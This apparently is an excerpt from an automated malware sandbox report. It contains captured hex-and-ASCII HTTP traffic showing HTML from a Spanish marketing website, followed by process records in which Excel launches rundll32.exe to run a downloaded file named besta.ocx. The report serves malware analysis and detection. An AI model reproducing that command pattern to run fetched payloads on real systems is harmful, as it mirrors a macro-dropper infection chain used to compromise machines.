                                                                                                                                          2021-12-02 09:27:32 UTC74INData Raw: 34 30 30 30 0d 0a 09 09 3c 64 69 76 20 64 61 74 61 2d 65 6c 65 6d 65 6e 74 6f 72 2d 74 79 70 65 3d 22 77 70 2d 70 61 67 65 22 20 64 61 74 61 2d 65 6c 65 6d 65 6e 74 6f 72 2d 69 64 3d 22 31 35 32 32 22 20 63 6c 61 73 73 3d 22 65 6c 65 6d 65 6e 74 6f 72 20 65 6c 65 6d 65 6e 74 6f 72 2d 31 35 32 32 22 20 64 61 74 61 2d 65 6c 65 6d 65 6e 74 6f 72 2d 73 65 74 74 69 6e 67 73 3d 22 5b 5d 22 3e 0a 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 6c 65 6d 65 6e 74 6f 72 2d 73 65 63 74 69 6f 6e 2d 77 72 61 70 22 3e 0a 09 09 09 09 09 09 09 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 65 6c 65 6d 65 6e 74 6f 72 2d 73 65 63 74 69 6f 6e 20 65 6c 65 6d 65 6e 74 6f 72 2d 74 6f 70 2d 73 65 63 74 69 6f 6e 20 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74
                                                                                                                                          Data Ascii: 4000<div data-elementor-type="wp-page" data-elementor-id="1522" class="elementor elementor-1522" data-elementor-settings="[]"><div class="elementor-section-wrap"><section class="elementor-section elementor-top-section elementor-element
                                                                                                                                          2021-12-02 09:27:32 UTC82INData Raw: 6d 65 6e 74 20 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 2d 65 62 38 36 34 31 61 20 65 6c 65 6d 65 6e 74 6f 72 2d 69 63 6f 6e 2d 6c 69 73 74 2d 2d 6c 61 79 6f 75 74 2d 69 6e 6c 69 6e 65 20 65 6c 65 6d 65 6e 74 6f 72 2d 61 6c 69 67 6e 2d 63 65 6e 74 65 72 20 65 6c 65 6d 65 6e 74 6f 72 2d 6c 69 73 74 2d 69 74 65 6d 2d 6c 69 6e 6b 2d 66 75 6c 6c 5f 77 69 64 74 68 20 65 6c 65 6d 65 6e 74 6f 72 2d 77 69 64 67 65 74 20 65 6c 65 6d 65 6e 74 6f 72 2d 77 69 64 67 65 74 2d 69 63 6f 6e 2d 6c 69 73 74 22 20 64 61 74 61 2d 69 64 3d 22 65 62 38 36 34 31 61 22 20 64 61 74 61 2d 65 6c 65 6d 65 6e 74 5f 74 79 70 65 3d 22 77 69 64 67 65 74 22 20 64 61 74 61 2d 77 69 64 67 65 74 5f 74 79 70 65 3d 22 69 63 6f 6e 2d 6c 69 73 74 2e 64 65 66 61 75 6c 74 22 3e 0a 09 09
                                                                                                                                          Data Ascii: ment elementor-element-eb8641a elementor-icon-list--layout-inline elementor-align-center elementor-list-item-link-full_width elementor-widget elementor-widget-icon-list" data-id="eb8641a" data-element_type="widget" data-widget_type="icon-list.default">
                                                                                                                                          2021-12-02 09:27:32 UTC90INData Raw: 0d 0a
                                                                                                                                          Data Ascii:
                                                                                                                                          2021-12-02 09:27:32 UTC90INData Raw: 34 30 30 30 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 69 6d 67 20 77 69 64 74 68 3d 22 36 36 32 22 20 68 65 69 67 68 74 3d 22 35 39 35 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 76 65 6e 64 65 73 2e 6d 61 72 6b 65 74 69 6e 67 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 31 2f 31 30 2f 61 6e 75 6e 63 69 6f 73 2e 70 6e 67 22 20 63 6c 61 73 73 3d 22 61 74 74 61 63 68 6d 65 6e 74 2d 66 75 6c 6c 20 73 69 7a 65 2d 66 75 6c 6c 22 20 61 6c 74 3d 22 22 20 6c 6f 61 64 69 6e 67 3d 22 6c 61 7a 79 22 20 73 72 63 73 65 74 3d 22 68 74 74 70 73 3a 2f 2f 76 65 6e 64 65 73 2e 6d 61 72 6b 65 74 69 6e 67 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 31 2f 31 30 2f 61 6e 75 6e 63 69 6f 73 2e 70 6e 67 20 36 36 32 77
                                                                                                                                          Data Ascii: 4000<img width="662" height="595" src="https://vendes.marketing/wp-content/uploads/2021/10/anuncios.png" class="attachment-full size-full" alt="" loading="lazy" srcset="https://vendes.marketing/wp-content/uploads/2021/10/anuncios.png 662w
                                                                                                                                          2021-12-02 09:27:32 UTC98INData Raw: 77 69 64 67 65 74 2d 77 72 61 70 20 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 2d 70 6f 70 75 6c 61 74 65 64 22 3e 0a 09 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 20 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 2d 30 61 38 31 31 36 38 20 65 6c 65 6d 65 6e 74 6f 72 2d 77 69 64 67 65 74 20 65 6c 65 6d 65 6e 74 6f 72 2d 77 69 64 67 65 74 2d 68 74 6d 6c 22 20 64 61 74 61 2d 69 64 3d 22 30 61 38 31 31 36 38 22 20 64 61 74 61 2d 65 6c 65 6d 65 6e 74 5f 74 79 70 65 3d 22 77 69 64 67 65 74 22 20 69 64 3d 22 63 65 6e 74 65 72 22 20 64 61 74 61 2d 77 69 64 67 65 74 5f 74 79 70 65 3d 22 68 74 6d 6c 2e 64 65 66 61 75 6c 74 22 3e 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 6c 65
                                                                                                                                          Data Ascii: widget-wrap elementor-element-populated"><div class="elementor-element elementor-element-0a81168 elementor-widget elementor-widget-html" data-id="0a81168" data-element_type="widget" id="center" data-widget_type="html.default"><div class="ele
                                                                                                                                          2021-12-02 09:27:32 UTC106INData Raw: 0d 0a
                                                                                                                                          Data Ascii:
                                                                                                                                          2021-12-02 09:27:32 UTC106INData Raw: 34 30 30 30 0d 0a 62 70 61 6e 65 6c 22 20 61 72 69 61 2d 6c 61 62 65 6c 6c 65 64 62 79 3d 22 65 6c 65 6d 65 6e 74 6f 72 2d 74 61 62 2d 74 69 74 6c 65 2d 37 35 33 31 22 3e 3c 70 3e 54 65 6e 65 6d 6f 73 20 70 6c 61 6e 65 73 20 64 65 73 64 65 20 3c 73 74 72 6f 6e 67 3e 24 39 39 55 53 44 3c 2f 73 74 72 6f 6e 67 3e 20 70 61 72 61 20 67 65 6e 65 72 61 72 20 63 6f 6e 74 65 6e 69 64 6f 20 65 6e 20 72 65 64 65 73 20 73 6f 63 69 61 6c 65 73 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6c 64 2b 6a 73 6f 6e 22 3e 7b 22 40 63 6f 6e 74 65 78 74 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 63 68 65 6d 61 2e 6f 72 67 22 2c 22 40 74 79 70 65 22
                                                                                                                                          Data Ascii: 4000bpanel" aria-labelledby="elementor-tab-title-7531"><p>Tenemos planes desde <strong>$99USD</strong> para generar contenido en redes sociales.</p></div></div><script type="application/ld+json">{"@context":"https:\/\/schema.org","@type"
                                                                                                                                          2021-12-02 09:27:32 UTC114INData Raw: 6e 22 20 64 61 74 61 2d 69 64 3d 22 61 30 64 30 35 36 65 22 20 64 61 74 61 2d 65 6c 65 6d 65 6e 74 5f 74 79 70 65 3d 22 77 69 64 67 65 74 22 20 64 61 74 61 2d 77 69 64 67 65 74 5f 74 79 70 65 3d 22 62 75 74 74 6f 6e 2e 64 65 66 61 75 6c 74 22 3e 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 6c 65 6d 65 6e 74 6f 72 2d 77 69 64 67 65 74 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 6c 65 6d 65 6e 74 6f 72 2d 62 75 74 74 6f 6e 2d 77 72 61 70 70 65 72 22 3e 0a 09 09 09 3c 61 20 68 72 65 66 3d 22 23 70 6c 61 6e 65 73 2d 79 2d 70 72 65 63 69 6f 73 22 20 63 6c 61 73 73 3d 22 65 6c 65 6d 65 6e 74 6f 72 2d 62 75 74 74 6f 6e 2d 6c 69 6e 6b 20 65 6c 65 6d 65 6e 74 6f 72 2d 62 75 74 74 6f 6e 20 65 6c 65 6d 65 6e
                                                                                                                                          Data Ascii: n" data-id="a0d056e" data-element_type="widget" data-widget_type="button.default"><div class="elementor-widget-container"><div class="elementor-button-wrapper"><a href="#planes-y-precios" class="elementor-button-link elementor-button elemen
                                                                                                                                          2021-12-02 09:27:32 UTC122INData Raw: 0d 0a
                                                                                                                                          Data Ascii:
                                                                                                                                          2021-12-02 09:27:32 UTC122INData Raw: 34 30 30 30 0d 0a 72 2d 74 61 62 2d 63 6f 6e 74 65 6e 74 20 65 6c 65 6d 65 6e 74 6f 72 2d 63 6c 65 61 72 66 69 78 22 20 64 61 74 61 2d 74 61 62 3d 22 31 22 20 72 6f 6c 65 3d 22 74 61 62 70 61 6e 65 6c 22 20 61 72 69 61 2d 6c 61 62 65 6c 6c 65 64 62 79 3d 22 65 6c 65 6d 65 6e 74 6f 72 2d 74 61 62 2d 74 69 74 6c 65 2d 32 33 32 31 22 3e 3c 70 3e 41 70 6f 72 74 61 20 65 6c 20 6d 61 79 6f 72 20 61 6c 63 61 6e 63 65 20 61 20 74 75 73 20 67 72 61 6e 64 65 73 20 70 72 6f 79 65 63 74 6f 73 20 65 6e 20 6c 61 20 77 65 62 2e 20 3c 61 20 68 72 65 66 3d 22 23 66 6f 72 6d 22 3e 53 6f 6c 69 63 69 74 61 20 75 6e 61 20 61 73 65 73 6f 72 c3 ad 61 3c 2f 61 3e 3c 2f 70 3e 3c 2f 64 69 76 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 73 63 72 69 70 74
                                                                                                                                          Data Ascii: 4000r-tab-content elementor-clearfix" data-tab="1" role="tabpanel" aria-labelledby="elementor-tab-title-2321"><p>Aporta el mayor alcance a tus grandes proyectos en la web. <a href="#form">Solicita una asesora</a></p></div></div><script
                                                                                                                                          2021-12-02 09:27:32 UTC130INData Raw: 0a 09 09 09 09 09 09 09 09 09 3c 2f 6c 69 3e 0a 09 09 09 09 09 09 09 09 3c 6c 69 20 63 6c 61 73 73 3d 22 65 6c 65 6d 65 6e 74 6f 72 2d 69 63 6f 6e 2d 6c 69 73 74 2d 69 74 65 6d 22 3e 0a 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 76 65 6e 64 65 73 2e 6d 61 72 6b 65 74 69 6e 67 2f 61 67 65 6e 63 69 61 2d 64 65 2d 6d 61 72 6b 65 74 69 6e 67 2d 64 69 67 69 74 61 6c 2f 65 2d 63 6f 6d 6d 65 72 63 65 2d 65 66 65 63 74 69 76 6f 2f 74 69 65 6e 64 61 2d 6f 6e 6c 69 6e 65 2d 63 6f 6e 2d 6d 61 67 65 6e 74 6f 2f 22 3e 0a 0a 09 09 09 09 09 09 09 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 65 6c 65 6d 65 6e 74 6f 72 2d 69 63 6f 6e 2d 6c 69 73 74 2d 69 63 6f 6e 22 3e 0a 09 09 09 09 09 09 09 3c 69 20 61 72 69 61 2d 68 69
                                                                                                                                          Data Ascii: </li><li class="elementor-icon-list-item"><a href="https://vendes.marketing/agencia-de-marketing-digital/e-commerce-efectivo/tienda-online-con-magento/"><span class="elementor-icon-list-icon"><i aria-hi
                                                                                                                                          2021-12-02 09:27:32 UTC138INData Raw: 0d 0a
                                                                                                                                          Data Ascii:
                                                                                                                                          2021-12-02 09:27:33 UTC138INData Raw: 33 62 34 35 0d 0a 61 74 65 64 22 3e 0a 09 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 20 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 2d 63 38 35 62 39 38 65 20 65 6c 65 6d 65 6e 74 6f 72 2d 77 69 64 67 65 74 20 65 6c 65 6d 65 6e 74 6f 72 2d 77 69 64 67 65 74 2d 73 70 61 63 65 72 22 20 64 61 74 61 2d 69 64 3d 22 63 38 35 62 39 38 65 22 20 64 61 74 61 2d 65 6c 65 6d 65 6e 74 5f 74 79 70 65 3d 22 77 69 64 67 65 74 22 20 64 61 74 61 2d 77 69 64 67 65 74 5f 74 79 70 65 3d 22 73 70 61 63 65 72 2e 64 65 66 61 75 6c 74 22 3e 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 6c 65 6d 65 6e 74 6f 72 2d 77 69 64 67 65 74 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 09 09 09 3c 64 69 76 20 63
                                                                                                                                          Data Ascii: 3b45ated"><div class="elementor-element elementor-element-c85b98e elementor-widget elementor-widget-spacer" data-id="c85b98e" data-element_type="widget" data-widget_type="spacer.default"><div class="elementor-widget-container"><div c
                                                                                                                                          2021-12-02 09:27:33 UTC146INData Raw: 65 6c 65 6d 65 6e 74 6f 72 2d 63 6f 6c 2d 31 30 30 20 65 6c 65 6d 65 6e 74 6f 72 2d 74 6f 70 2d 63 6f 6c 75 6d 6e 20 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 20 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 2d 63 36 36 65 37 32 63 22 20 64 61 74 61 2d 69 64 3d 22 63 36 36 65 37 32 63 22 20 64 61 74 61 2d 65 6c 65 6d 65 6e 74 5f 74 79 70 65 3d 22 63 6f 6c 75 6d 6e 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 6c 65 6d 65 6e 74 6f 72 2d 77 69 64 67 65 74 2d 77 72 61 70 20 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 2d 70 6f 70 75 6c 61 74 65 64 22 3e 0a 09 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 20 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 2d 62 38
                                                                                                                                          Data Ascii: elementor-col-100 elementor-top-column elementor-element elementor-element-c66e72c" data-id="c66e72c" data-element_type="column"><div class="elementor-widget-wrap elementor-element-populated"><div class="elementor-element elementor-element-b8
                                                                                                                                          2021-12-02 09:27:33 UTC153INData Raw: 0d 0a
                                                                                                                                          Data Ascii:
                                                                                                                                          2021-12-02 09:27:33 UTC153INData Raw: 32 61 38 32 0d 0a 09 09 3c 64 69 76 20 64 61 74 61 2d 65 6c 65 6d 65 6e 74 6f 72 2d 74 79 70 65 3d 22 66 6f 6f 74 65 72 22 20 64 61 74 61 2d 65 6c 65 6d 65 6e 74 6f 72 2d 69 64 3d 22 32 31 35 37 22 20 63 6c 61 73 73 3d 22 65 6c 65 6d 65 6e 74 6f 72 20 65 6c 65 6d 65 6e 74 6f 72 2d 32 31 35 37 20 65 6c 65 6d 65 6e 74 6f 72 2d 6c 6f 63 61 74 69 6f 6e 2d 66 6f 6f 74 65 72 22 20 64 61 74 61 2d 65 6c 65 6d 65 6e 74 6f 72 2d 73 65 74 74 69 6e 67 73 3d 22 5b 5d 22 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 6c 65 6d 65 6e 74 6f 72 2d 73 65 63 74 69 6f 6e 2d 77 72 61 70 22 3e 0a 09 09 09 09 09 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 65 6c 65 6d 65 6e 74 6f 72 2d 73 65 63 74 69 6f 6e 20 65 6c 65 6d 65 6e 74 6f 72 2d 74 6f 70 2d 73 65 63 74 69 6f 6e
                                                                                                                                          Data Ascii: 2a82<div data-elementor-type="footer" data-elementor-id="2157" class="elementor elementor-2157 elementor-location-footer" data-elementor-settings="[]"><div class="elementor-section-wrap"><section class="elementor-section elementor-top-section
                                                                                                                                          2021-12-02 09:27:33 UTC161INData Raw: 64 61 74 61 2d 65 6c 65 6d 65 6e 74 5f 74 79 70 65 3d 22 63 6f 6c 75 6d 6e 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 6c 65 6d 65 6e 74 6f 72 2d 77 69 64 67 65 74 2d 77 72 61 70 20 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 2d 70 6f 70 75 6c 61 74 65 64 22 3e 0a 09 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 20 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 2d 34 37 30 62 32 30 34 31 20 65 6c 65 6d 65 6e 74 6f 72 2d 77 69 64 67 65 74 20 65 6c 65 6d 65 6e 74 6f 72 2d 77 69 64 67 65 74 2d 6d 65 6e 75 2d 61 6e 63 68 6f 72 22 20 64 61 74 61 2d 69 64 3d 22 34 37 30 62 32 30 34 31 22 20 64 61 74 61 2d 65 6c 65 6d 65 6e 74 5f 74 79 70 65 3d 22 77 69 64 67 65 74 22 20 64 61
                                                                                                                                          Data Ascii: data-element_type="column"><div class="elementor-widget-wrap elementor-element-populated"><div class="elementor-element elementor-element-470b2041 elementor-widget elementor-widget-menu-anchor" data-id="470b2041" data-element_type="widget" da
                                                                                                                                          2021-12-02 09:27:33 UTC164INData Raw: 0d 0a
                                                                                                                                          Data Ascii:
                                                                                                                                          2021-12-02 09:27:33 UTC164INData Raw: 31 64 38 33 0d 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 68 74 6d 6f 76 65 2d 71 75 69 63 6b 2d 76 69 65 77 2d 6d 6f 64 61 6c 22 20 69 64 3d 22 68 74 6d 6f 76 65 71 75 69 63 6b 2d 76 69 65 77 6d 6f 64 61 6c 22 20 73 74 79 6c 65 3d 22 76 69 73 69 62 69 6c 69 74 79 3a 20 68 69 64 64 65 6e 3b 6f 70 61 63 69 74 79 3a 20 30 3b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 74 6d 6f 76 65 2d 6d 6f 64 61 6c 2d 64 69 61 6c 6f 67 20 70 72 6f 64 75 63 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 74 6d 6f 76 65 2d 6d 6f 64 61 6c 2d 63 6f 6e 74 65 6e 74 22 3e 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 20 63 6c 61 73 73 3d 22 68 74 6d 6f 76 65 2d 6d 6f 64 61 6c 2d 63 6c 6f
                                                                                                                                          Data Ascii: 1d83<div class="woocommerce htmove-quick-view-modal" id="htmovequick-viewmodal" style="visibility: hidden;opacity: 0;display:none;"><div class="htmove-modal-dialog product"><div class="htmove-modal-content"><button type="button" class="htmove-modal-clo


                                                                                                                                          Code Manipulations

                                                                                                                                          Statistics

                                                                                                                                          Behavior

                                                                                                                                          Click to jump to process

                                                                                                                                          System Behavior

                                                                                                                                          General

                                                                                                                                          Start time:10:26:01
                                                                                                                                          Start date:02/12/2021
                                                                                                                                          Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:"C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding
                                                                                                                                          Imagebase:0xab0000
                                                                                                                                          File size:27110184 bytes
                                                                                                                                          MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high

                                                                                                                                          General

                                                                                                                                          Start time:10:27:33
                                                                                                                                          Start date:02/12/2021
                                                                                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:C:\Windows\SysWow64\rundll32.exe ..\besta.ocx,44532.4348061343
                                                                                                                                          Imagebase:0xc30000
                                                                                                                                          File size:61952 bytes
                                                                                                                                          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high

                                                                                                                                          Disassembly

                                                                                                                                          Code Analysis

                                                                                                                                          Reset < >